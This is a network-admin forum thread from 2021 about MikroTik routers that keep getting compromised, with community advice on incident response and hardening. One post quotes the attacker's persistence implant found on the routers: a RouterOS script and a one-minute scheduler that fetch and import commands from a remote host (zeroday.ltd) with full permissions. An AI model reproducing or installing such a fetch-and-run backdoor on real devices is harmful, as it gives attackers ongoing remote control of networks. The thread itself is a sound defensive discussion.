Mikrotik router Hacked!!!

humanbot · November 3, 2021, 8:39am

Hi all,

This past week we have been facing a lot of hacking issue on our router. The symptoms is all the same, router can still be ping, cannot be remote, L2 traffic working fine but all L3 traffic down, LCD no screen. When we try to reboot the router, it would crash the router and boot kernel failure.

These are several prevention that we have done

Non standard port for remote router (not 8291, 21 or 22)
/ip/service only allow certain IP to remote the router
Firewall input packet with port scanner rule and drop the suspected IP
Upgrade router firmware and version to the latest (6.49)

This has happen for quite a number of our router with different model (ccr1036, ccr1009, 4011, 3011, 1100, etc)

Anybody happens to have the same problem? Any other configuration we could done to prevent this?

Thank you

jvanhambelgium · November 3, 2021, 9:40am

What makes you think this has anything to do with “hacking” ?
Some of the issues you mention is possible normal behavior with the latest “stable” ROS releases.

afuchs · November 3, 2021, 10:09am

Only because it’s not on your list:

create a new user and delete the admin (don’t use somtiing like ‘noc’ or other standards.
set up a massaging for logins, so you have the chance to notice if someone is working on it who shouldn’t (e.g. email for system,account)

Backups and configuration export not not mentioned (for recovery with netinstlall if something goes bad).

anav · November 3, 2021, 12:55pm

Are you allowing access to the router from external sites?
If so how are you doing this?
Which kind of VPN are you using for this access??

/export hide-sensitive file=anynameyouwish

mrfloydcro · November 3, 2021, 3:10pm

Hi,
Have you tried to check in scheduler and scripts, in router, for something unusual?

humanbot · November 4, 2021, 2:37am

Hi, We are quite sure because over 15pcs of router has the same issue, before that we are using old version 6.3xx after upgrading to 6.49 the same issue reappear

humanbot · November 4, 2021, 4:47am

Hi,

We have disable the access to router only from certain ip (office). If we are outside of office, we need to do L2tp before we can login to the router.

We are blocking the access using /ip/services, with non standard port and certain IP only to access the router. We have also do weekly backup to ftp

During the checking from one of our router backup, we found this script

/script
add dont-require-permissions=no name=fetch owner=god policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon source=“/
tool fetch url=http://0.zeroday.ltd/command.scr; :delay 10; /import file-n
ame=command.scr; :delay 30; /file remove command.scr”

/scheduler
add interval=1m name=fetch1m on-event=fetch policy=
ftp,reboot,read,write,policy,test,password,sniff,sensitive,romon
start-date=oct/22/2021 start-time=17:05:35

We have tried to download this file “command.scr”, when we run it’s only html file.

Any other suggestion guys?

jvanhambelgium · November 4, 2021, 7:27am

Now THAT is indeed something completely different and looks not good. (as you guessed, that script should not be there…)
This URL-fetches indeed some ROS-CLI/script code and therefore can be configured/provisioned with whatever needs to be exploited/attacked or something at a certain time.

I think the only safe way is to NETINSTALL these devices again.
After that, prepare all the config and only connect to “Internet” when you checked that all usernames/passwords/services are hardened.
Probably this was hacked long time ago with some ROS-versions that has serious issues.

Perhaps the danger is also coming from “inside” you network ?

holvoetn · November 4, 2021, 8:00am

It does look like someone has had (still has ?) access to your device.

What I would do:

Block all external access to that device (pull the WAN cable out, sorry for that but it’s needed)
remove that script and schedule
review any other script/auto-setting/whatever still available in Files
review your logs for admin and VPN access
change password of admin user (better: make new user with admin rights and REMOVE default admin user)
change L2TP credentials
review your firewall (enable logging for all possible open ports until you identify the open door)
Obviously someone is able to get in one way or the other so investigate those logs and firewall settings carefully.

Connect WAN again and regularly investigate logs for admin/VPN access. You could use a script to have them mailed to you periodically.
See what happens.

If all fails - emergency situation:
factory reset that router and start again.
Do NOT import any settings/scripts from the old environment without having seen every single line.

Others will surely chime in with alternative (better) suggestions.
EDIT: someone just did.

Jotne · November 4, 2021, 8:36am

Your router was hacked before it was upgraded, due to bug in Winbox on older version.

There are only one good solution:
Netinstall
Do NOT restore config
Export old config and add manually only what is needed.

tangent · November 4, 2021, 11:35am

I agree. The “zeroday.ltd” bit looks suspiciously like this post, which points to this 3-year-old CVE. OP may be part of the Mēris resurgence.

anav · November 4, 2021, 1:16pm

Remove all devices from internet,
Export the config, so you can remember the NEEDED settings but dont copy blindly,
As stated netinstall and do not copy old config to new firmware.
Do not use any of same passwords and change port number for winbox or ssh for example.

Ensure all connected PCs etc are fully scanned with antivirus/malware etc…

humanbot · November 4, 2021, 3:04pm

Hi,

We have removed the hacked device, replace with new one, we added new settings remove all mactelnet mac winboz capabilities. But after a day or so, its being hacked again. Really confused and frustated with whats going on.

All the hacked router, they have set random reset timer, so it’s very hard to be reset. After much patient, we managed to reset 40% of the router, but the rest is still on going. After each reset, we would netinstall the router and it feels like a brand new.

But after we put it to production, it would get hack as well like the new router.

All ppp secrets, scripts, scheduler, all of the admin (with full and write authorities) computer has been scanned with anti virus, all checked and no problem. We have also change default username with strange name and hard password

We are considering is this an exploit bug in mikrotik or a hole in linux OS that runs mikrotik?

Any idea guys?

anav · November 4, 2021, 3:08pm

Yes, stop using infected routers.
You need to install fresh netinstall latest firmware.
Use different passwords etc…
CHANGE ALL YOUR VPN settings, everything should be different from before.
Assume all passwords and secrets of all settings are known.

The only way you are being hacked is if you are not following basic security instructions.
The exploit is your own stupidity as an admin./… also for not keeping routers up to date …

holvoetn · November 4, 2021, 3:52pm

A bit harsh but it does boil down to this, yes.

holvoetn · November 4, 2021, 7:00pm

Adding an analogy, maybe it will become more clear:

Water is pouring from the tap, sink is spilling over.
What do you do first ?
Clean up the spilled water or close the tap ?

Right now it looks like you’re only cleaning… you’ll keep doing that until you close the tap.

anav · November 4, 2021, 9:03pm

A much kinder way of saying that, thanks Holeven, but not even close to satisfying

holvoetn · November 4, 2021, 9:09pm

I know.
Still learning that part too

anav · November 4, 2021, 9:11pm

Well, anybody that calls themselves an admin is allowed to make mistakes but when
they repeat the same mistakes after being given information on how to avoid it… blunt is less refined but more appropriate.

infabo · November 4, 2021, 9:40pm